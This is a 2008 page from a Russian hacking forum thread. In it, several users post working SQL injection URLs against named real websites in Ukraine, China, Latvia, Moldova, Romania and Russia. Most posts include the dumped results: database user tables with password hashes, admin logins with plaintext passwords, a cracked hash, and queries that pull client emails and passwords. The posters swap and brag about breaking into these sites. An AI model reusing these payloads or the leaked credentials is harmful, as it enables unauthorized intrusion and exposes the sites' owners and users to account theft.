ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #5771  
Старый 21.06.2008, 02:29
Аватар для Petr
Petr
Banned
Регистрация: 10.06.2006
Сообщений: 938
Провел на форуме:
7792614

Репутация: 1223


По умолчанию

Раскрутил скулю бальтозара, не без помощи суча

Цитата:
http://pipe.com.ua/j2me/view.php?m_id=-2+union+select+1,2,concat_ws(0x3a,l_name,l_passwd) ,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,2 2,23,24,25,26,27,28,29,30,31,32+from+amgrit.login+ limit+0,1/*
ray:muter342
 
Ответить с цитированием

  #5772  
Старый 21.06.2008, 14:56
Аватар для gibson
gibson
Moderator - Level 7
Регистрация: 24.02.2006
Сообщений: 447
Провел на форуме:
2872049

Репутация: 705
Отправить сообщение для gibson с помощью ICQ
По умолчанию

chinacourt.org
Цитата:
http://en.chinacourt.org/public/detail.php?id=999+union+select+1,concat(user,char( 58),password,char(58),File_priv,char(58),host)+fro m+mysql.user
5.0.51a-log:dbuser@localhost:fy_en
root::Y:localhost
zq16167:22f421104e6fdb11:N:192.168.100.%
dbuser:0a9aadd73a743bd7:Y:localhost
dadmin:4f73678d19210e5a:N:192.168.100.23
polluser:5f33fe201e0b7703:N:localhost

Цитата:
CHARACTER_SETS
COLLATIONS
VIEWS
announce
announce_bills
announce_cancel_cause
announce_charge
announce_courts
announce_debtors
announce_status
auction
ad_click
ad_click_detail
area
article
article_court
article_keyword
article_location
article_log
article_subject
click_count
comment
control
court
court_level
court_reg_class
direct
images
location_img
lszx_charge
lszx_config
lszx_domain
lszx_image
lszx_organization
lszx_province
lszx_search
lszx_specialty
manager
id
enable_flag
types
account
password
location
reg_date
name
1:1:0:root:mt28xqfch:0000000000:2002-01-18 16:51:12
3:0:2:newsmanager:gsdlj:0000000000:2002-05-29 10:02:54
manager_log
obj
obj_class
obj_info
obj_pic
subject
subject_kind
video
vote_data
мля нифига не понимаю по китайски)
 
Ответить с цитированием

  #5773  
Старый 21.06.2008, 17:52
Аватар для Petr
Petr
Banned
Регистрация: 10.06.2006
Сообщений: 938
Провел на форуме:
7792614

Репутация: 1223


По умолчанию

Цитата:
http://www.realty.lv/?lang=ru&id=2&category_id=1&news_id=-4868'+union+select+1,2,3,login,pass,6,7,8,9,0,1+fr om+user+where+id=1/*
До админки добратся не получилось
 
Ответить с цитированием

  #5774  
Старый 21.06.2008, 18:34
Аватар для z1k
z1k
Новичок
Регистрация: 11.05.2008
Сообщений: 12
Провел на форуме:
36048

Репутация: 5
По умолчанию

Код:
http://www.aif.md/index.php?id=-52+union+select+1,2,version(),4,5,6,7,8/*
Код:
http://www.vedomosti.md/index.php?doc=6&ID=-417+union+select+1,2,3,4,5,6,7,version()/*
Код:
http://www.studii.md/work_view_vacancy_detail.php?id=-3055+union+select+1,2,3,version(),5,6,7,8,9,10,11,12,13,14,15,16/*
Код:
http://www.statistica.md/news.php?lang=ru&id=-173+UNION+SELECT+1,2,version(),4,5,6,7,8,9,10,11/*
Код:
http://www
Код:
.rabo
ta.md/vacancies/vacancy/index.php?id=-7052+union+select+1,2,3,version(),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21/*
Код:
http://www.ipoteka.md/ro/law.php?ID=-5+union+select+1,2,3,4,5,6,7,8,9,version(),11,12,13,14,15,16/*
Код:
http://www.aquasystems.md/readarticle.php?id=-3+union+select+1,2,table_name+from+information_schema.tables/*
.мд пад апстрелам )
 
Ответить с цитированием

  #5775  
Старый 21.06.2008, 18:38
Аватар для Fata1ex
Fata1ex
Постоянный
Регистрация: 12.12.2006
Сообщений: 906
Провел на форуме:
4205500

Репутация: 930


По умолчанию

Цитата:
http://www
Научи такие скули находить
 
Ответить с цитированием

  #5776  
Старый 21.06.2008, 19:01
Аватар для z1k
z1k
Новичок
Регистрация: 11.05.2008
Сообщений: 12
Провел на форуме:
36048

Репутация: 5
По умолчанию

Цитата:
Сообщение от Fata1ex  
Научи такие скули находить
ты там ниже пакрути там все есть чото хз чо так вышло
 
Ответить с цитированием

  #5777  
Старый 21.06.2008, 19:42
Аватар для Cr@zy_King
Cr@zy_King
Новичок
Регистрация: 12.09.2007
Сообщений: 8
Провел на форуме:
1010735

Репутация: 20
По умолчанию

http://www.aquasystems.md/readarticle.php?id=-3+union+select+1,2,table_name+from+information_sch ema.tables/*

http://www.aquasystems.md/readarticle.php?id=-3+union+select+1,password,name+from+rgb_members/*

User : OzzZZ
Hass : 6055322b3c1cc50cef132211ca57aa75 Cracked : 29123098

good.



good.
 
Ответить с цитированием

  #5778  
Старый 21.06.2008, 20:02
Аватар для z1k
z1k
Новичок
Регистрация: 11.05.2008
Сообщений: 12
Провел на форуме:
36048

Репутация: 5
По умолчанию

Цитата:
Сообщение от Cr@zy_King  
http://www.aquasystems.md/readarticle.php?id=-3+union+select+1,2,table_name+from+information_sch ema.tables/*

http://www.aquasystems.md/readarticle.php?id=-3+union+select+1,password,name+from+rgb_members/*

User : OzzZZ
Hass : 6055322b3c1cc50cef132211ca57aa75 Cracked : 29123098

good.




good.
да да я знаю) я все крутил до последнего) но выложивать не стал т.к. тот кто знает тот розберецца... тут все просто .....
 
Ответить с цитированием

  #5779  
Старый 21.06.2008, 20:09
Аватар для Gorev
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944

Репутация: 1550


Отправить сообщение для Gorev с помощью ICQ Отправить сообщение для Gorev с помощью Yahoo
По умолчанию

а вот вам добавочка.... правда прикольно? )))

http://www.aquasystem.ro/sectiuni.php?nSId=-3+union+select+1,concat_ws(0x3a,database(),version (),user()),3,4,5,6,7/*

Database Version: 5.0.32-Debian_7etch5-log
Database name: aquasystem
User name: aevum@localhost
 
Ответить с цитированием

  #5780  
Старый 21.06.2008, 21:53
Аватар для sabe
sabe
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
Провел на форуме:
1404552

Репутация: 568
Отправить сообщение для sabe с помощью ICQ Отправить сообщение для sabe с помощью AIM Отправить сообщение для sabe с помощью Yahoo
По умолчанию

Stolica.ru
Цитата:
http://stolica.ru/s/prop/prop.pl?d&name=price&node=group&node_name=1%27%20u nion%20select%20concat_ws(0x3a,name,passwd)+from+u serreg/*
кароч. очень заплутаный и кривой сайт.)

Atvideo.ru
Цитата:
http://www.atvideo.ru/search/?words=1'
Gorev
Цитата:
http://www.aquasystem.ro/sectiuni.php?nSId=-3+union+select+1,concat_ws(0x3a,client_email,clien t_pwd),3,4,5,6,7+from+client/*
нашел админку: /admin
но нет соответствия в базе.)

Последний раз редактировалось sabe; 22.06.2008 в 02:54..
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ